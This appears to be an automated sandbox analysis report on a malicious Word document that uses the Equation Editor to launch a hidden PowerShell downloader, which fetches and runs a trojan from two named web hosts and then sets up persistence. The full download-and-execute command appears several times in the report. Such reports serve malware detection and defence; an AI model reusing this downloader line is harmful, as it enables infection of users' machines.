Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''Jump to behavior
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''Jump to behavior
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_00415D50 GetCurrentProcess,LoadLibraryA,GetProcAddress,GetProcAddress,NtQueryInformationProcess,18_2_00415D50
PE file contains an invalid checksumShow sources
Source: ounehcnaykuL.exe.10.drStatic PE information: real checksum: 0x24b51 should be: 0x46e3d
Source: ounehcnaykuM.exe.15.drStatic PE information: real checksum: 0x24b51 should be: 0x46e3d
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_00415CCB push ebx; ret 18_2_00415CCC
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001F3959 push ecx; ret 18_2_001F396C
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 21_2_00415CCB push ebx; ret 21_2_00415CCC
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 21_2_00183959 push ecx; ret 21_2_0018396C

Spreading:

barindex
Creates COM task schedule object (often to register a task for autostart)Show sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgidJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgidJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgIDJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgidJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgidJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgIDJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgidJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgidJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001E2530 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,GetLastError,FindClose,18_2_001E2530
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 21_2_00172530 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,GetLastError,FindClose,21_2_00172530

System Summary:

barindex
Dropped file seen in connection with other malwareShow sources
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe 492AAF70E95987373A3C01F6AFA10C9F064D756871D6B02D7F65E03E70E92AC9
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe 492AAF70E95987373A3C01F6AFA10C9F064D756871D6B02D7F65E03E70E92AC9
Powershell connects to networkShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 87.247.241.143 80Jump to behavior
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeJump to dropped file
Contains functionality to call native functionsShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_00415D50 GetCurrentProcess,LoadLibraryA,GetProcAddress,GetProcAddress,NtQueryInformationProcess,18_2_00415D50
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001E67C0 NtQueryInformationProcess,18_2_001E67C0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 21_2_00415D50 GetCurrentProcess,LoadLibraryA,GetProcAddress,GetProcAddress,NtQueryInformationProcess,21_2_00415D50
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 21_2_001767C0 NtQueryInformationProcess,NtQueryInformationProcess,21_2_001767C0
Contains functionality to launch a process as a different userShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001EC430 GetStartupInfoW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetLastError,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,CloseHandle,AdjustTokenPrivileges,CloseHandle,18_2_001EC430
Creates files inside the system directoryShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeFile created: C:\Windows\TEMP\~DF7F9397C12E76BC41.TMPJump to behavior
Creates mutexesShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMutant created: \Sessions\1\BaseNamedObjects\789C000000000
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMutant created: \BaseNamedObjects\789C000000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Deletes Windows filesShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeFile deleted: C:\Windows\Temp\VBB688.tmpJump to behavior
Detected potential crypto functionShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001EFE3018_2_001EFE30
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001F21B018_2_001F21B0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 21_2_0017FE3021_2_0017FE30
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 21_2_001821B021_2_001821B0
Document contains no OLE stream with summary informationShow sources
Source: VBA869.tmp.14.drOLE indicator has summary info: false
Source: VB8E64.tmp.16.drOLE indicator has summary info: false
Source: VBB688.tmp.20.drOLE indicator has summary info: false
Document has an unknown application nameShow sources
Source: VBA869.tmp.14.drOLE indicator application name: unknown
Source: VB8E64.tmp.16.drOLE indicator application name: unknown
Source: VBB688.tmp.20.drOLE indicator application name: unknown
Document misses a certain OLE stream usually present in this Microsoft Office document typeShow sources
Source: VBA869.tmp.14.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: VB8E64.tmp.16.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: VBB688.tmp.20.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
PE file contains strange resourcesShow sources
Source: ounehcnaykuL.exe.10.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: ounehcnaykuM.exe.15.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Binary contains paths to development resourcesShow sources
Source: ounehcnaykuM.exe, 00000010.00000000.10221288120.00401000.00000020.sdmp, ounehcnaykuM.exe, 00000012.00000000.10355250967.00401000.00000020.sdmp, ounehcnaykuM.exe, 00000014.00000000.10399473117.00401000.00000020.sdmp, ounehcnaykuM.exe, 00000015.00000000.10613423172.00401000.00000020.sdmp, ounehcnaykuL.exe.10.drBinary or memory string: @pA*\AE:\56202002\Likelihood.vbp
Source: ounehcnaykuM.exe, 00000010.00000001.10223541229.00417000.00000004.sdmp, ounehcnaykuM.exe, 00000014.00000002.10617465195.00417000.00000004.sdmpBinary or memory string: @*\AE:\56202002\Likelihood.vbp
Classification labelShow sources
Source: classification engineClassification label: mal100.evad.expl.troj.winDOCX@23/42@10/4
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001F3130 LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,18_2_001F3130
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001EFBD0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,AdjustTokenPrivileges,CloseHandle,18_2_001EFBD0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001EC430 GetStartupInfoW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetLastError,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,CloseHandle,AdjustTokenPrivileges,CloseHandle,18_2_001EC430
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 21_2_0017C430 GetStartupInfoW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,CreateProcessAsUserW,CloseHandle,AdjustTokenPrivileges,AdjustTokenPrivileges,CloseHandle,21_2_0017C430
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 21_2_0017FBD0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,AdjustTokenPrivileges,CloseHandle,21_2_0017FBD0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 21_2_00183130 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,21_2_00183130
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001E7850 CreateToolhelp32Snapshot,Process32FirstW,lstrcmpiW,Process32NextW,OpenProcess,CloseHandle,18_2_001E7850
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001EEAC0 CoCreateInstance,CoCreateInstance,CoCreateInstance,18_2_001EEAC0
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001EF7D0 FindResourceW,LoadResource,LockResource,18_2_001EF7D0
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$RMP16T.docxJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user~1\AppData\Local\Temp\CVRB147.tmpJump to behavior
Document contains summary information with irregular field valuesShow sources
Source: VBA869.tmp.14.drOLE document summary: title field not present or empty
Source: VBA869.tmp.14.drOLE document summary: author field not present or empty
Source: VBA869.tmp.14.drOLE document summary: edited time not present or 0
Source: VB8E64.tmp.16.drOLE document summary: title field not present or empty
Source: VB8E64.tmp.16.drOLE document summary: author field not present or empty
Source: VB8E64.tmp.16.drOLE document summary: edited time not present or 0
Source: VBB688.tmp.20.drOLE document summary: title field not present or empty
Source: VBB688.tmp.20.drOLE document summary: author field not present or empty
Source: VBB688.tmp.20.drOLE document summary: edited time not present or 0
Executes batch filesShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe CmD /C %tmp%\task.bat & UUUUUUUU c
Found command line outputShow sources
Source: C:\Windows\System32\cmd.exeConsole Write: ............................l...x...@...+...........................A.p.p.D.a.t.a.\.L.o.c.a.Z!.|..+.H.+......EZJ....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.>.................@.[J..+...>w@.[J..C.....L.+.(.....+....v..+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.a.l.l.l...x...@...7.....................................+..b=w..Du`...L.+.T.+...+................vJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....l...x...@...=.............................................+..b=w.<.|X.+.....j....EZJ......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................l...x...@...E...............................j...............@F[J.<.|x.+...+......EZJ......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................l...x...@...L...........................A.p.p.D.a.t.a.\.L.o.c.a..$.|..+...+......EZJ......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.>.........p.D.a.t.a.\.L.o.c.a..$.|..+.(.L...+.(.....+....v..+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................#.c.a.l.c...e.x.e...X.............................C.<.XJ.....b=w..Du\.....+...+...+................vJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................l...x...@...^.............................+...+.(.L.....(.L.....2&.|@.+...+......EZJ......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..|.+...+.E.XJ........1#......@F[J. ..|.+...C.....V.XJ............|.+.......}u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................l...x...@...v...........................A.p.p.D.a.t.a.\.L.o.c.a..$.|..+...+......EZJ......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................P.o.w.e.r.S.h.e.l.l.......................................+..b=w..Du\.....+...+...+................vJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....l...x...@.................................................+..b=w.&.| .+..........EZJ......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................l...x...@...................................................@F[J2&.|@.+...+......EZJ......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..(.+...+.E.XJ........1#......@F[J. ..(.+...C.....V.XJ............(.+.......}u........`.....,.....Jump to behavior
Parts of this applications are using VB runtime library 6.0 (Probably coded in Visual Basic)Show sources
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeSection loaded: C:\Windows\System32\msvbvm60.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeSection loaded: C:\Windows\System32\msvbvm60.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeSection loaded: C:\Windows\System32\msvbvm60.dllJump to behavior
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\FORMP16T.docx
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\JPEGIM32.FLT
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe CmD /C %tmp%\task.bat & UUUUUUUU c
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe'
Source: unknownProcess created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {4FF6B578-0DC8-43D6-96ED-9BD735AC3890} S-1-5-18:NT AUTHORITY\System:Service:
Source: unknownProcess created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe svchost.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\microsoft shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\JPEGIM32.FLTJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\System32\cmd.exe CmD /C %tmp%\task.bat & UUUUUUUU cJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeProcess created: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeProcess created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeJump to behavior
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Jump to behavior
